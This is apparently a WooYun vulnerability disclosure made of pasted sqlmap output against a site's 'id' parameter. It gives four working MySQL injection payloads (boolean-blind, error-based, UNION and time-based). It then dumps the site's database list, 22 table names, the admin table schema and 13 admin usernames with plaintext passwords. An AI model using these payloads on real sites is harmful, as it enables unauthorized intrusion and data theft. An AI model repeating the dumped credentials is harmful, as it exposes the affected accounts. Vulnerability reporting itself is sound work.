WooYun.org

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=15' AND 7888=7888 AND 'fYlX'='fYlX
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=15' AND (SELECT 2926 FROM(SELECT COUNT(*),CONCAT(0x3a61666f3a,(S
ELECT (CASE WHEN (2926=2926) THEN 1 ELSE 0 END)),0x3a616b753a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ebJy'='ebJy
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=15' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a61666f3a,0x53597764476
f6b63696e,0x3a616b753a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=15' AND SLEEP(5) AND 'ZJhP'='ZJhP
available databases [3]:
[*] information_schema
[*] test
[*] wcm
current database: 'wcm'
current user: 'user_wcm@localhost'
Database: wcm
[22 tables]
+--------------+
| admin |
| bbslist |
| bbsmain |
| bzsp |
| bztl |
| dtproperties |
| dwdg |
| dzw |
| dzwqw |
| f_bzsp |
| gjgy |
| jb |
| jqdt |
| sqbz |
| sqbz_zl |
| tbtj |
| tz |
| userinfo |
| visitorcount |
| zcfg |
| zrbhq |
| zwdg |
+--------------+
Database: wcm
Table: admin
[3 columns]
+----------+-----------+
| Column | Type |
+----------+-----------+
| id | int(10) |
| pwd | char(200) |
| username | char(200) |
+----------+-----------+
Database: wcm
Table: admin
[13 entries]
+------------+
| username |
+------------+
| 213 |
| Daniel |
| fuhui |
| hsl |
| ldx |
| linxinghua |
| lxiaod |
| mlr |
| sy |
| wyz |
| yonhon |
| zfb |
| zwb |
+------------+
Database: wcm
Table: admin
[13 entries]
+----------+
| pwd |
+----------+
| 080502 |
| 0915 |
| 1007 |
| 1111 |
| 1111 |
| 1111 |
| 1234 |
| 2222 |
| 29346 |
| 730502gs |
| 8542 |
| lll |
| wildlife |
+----------+
你懂！